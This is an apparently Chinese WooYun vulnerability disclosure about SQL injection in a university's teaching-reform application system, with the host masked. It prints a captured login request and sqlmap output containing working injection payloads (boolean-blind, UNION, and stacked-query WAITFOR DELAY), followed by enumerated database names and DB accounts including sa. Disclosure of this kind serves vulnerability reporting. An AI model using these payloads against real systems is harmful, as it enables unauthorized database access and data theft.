当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150694

漏洞标题:桂林电子科技大学某处存在注入(13库可shell)

相关厂商:CCERT教育网应急响应组

漏洞作者: Hackshy

提交时间:2015-10-31 17:55

修复时间:2015-11-05 17:56

公开时间:2015-11-05 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-31: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

没有自己学校权限的帽子不是好帽子,还差2个rank,求过求过。

详细说明:

教改项目网上申报评审系统登陆处:http://**.**.**.**/jiaowuchu/jiaogai/default.asp
抓了个包,内容如下:

POST /jiaowuchu/jiaogai/checklogin.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/jiaowuchu/jiaogai/default.asp
Cookie: ASPSESSIONIDQCDCARTT=JLNLCANAGNHHAOLCPOKHEAIA; SERVERID=w3Server
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
UserName=admin&Password=admin&leibie=%BD%CC%CA%A6&Action=Login&Submit.x=45&Submit.y=99


然后交给SQLMAP跑吧。

漏洞证明:

Parameter: ArticleID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ArticleID=172 AND 7667=7667
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: ArticleID=-2995 UNION ALL SELECT CHR(113)&CHR(106)&CHR(98)&CHR(107)&CHR(113)&CHR(88)&CHR(89)&CHR(75)&CHR(99)&CHR(99)&CHR(88)&CHR(108)&CHR(80)&CHR(87)&CHR(73)&CHR(113)&CHR(107)&CHR(122)&CHR(107)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
current user is DBA:	None
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: UserName (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: UserName=admin');WAITFOR DELAY '0:0:5'--&Password=admin&leibie=%BD%CC%CA%A6&Action=Login&Submit.x=45&Submit.y=99
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
available databases [13]:
[*] Dept8Data
[*] gdfzdb
[*] gietwww
[*] guetexam
[*] jwcweb
[*] master
[*] model
[*] msdb
[*] niccheck
[*] Northwind
[*] OuYangNingData
[*] pubs
[*] tempdb

下面是账号:

web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
database management system users [17]:
[*] appuser
[*] BUILTIN\\Administrators
[*] cmpp
[*] dpt8www
[*] energy_user
[*] gietnews
[*] guetexam
[*] jcfx_user
[*] jwcweb
[*] lzframe
[*] lzjc
[*] niccheck
[*] ouYangNing
[*] sa
[*] test
[*] travel
[*] zwx\x05
sqlmap resumed the following injection point(s) from stored session:


不深入了。

修复方案:

过滤。

版权声明:转载请注明来源 Hackshy@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-05 17:56

厂商回复:

最新状态:

暂无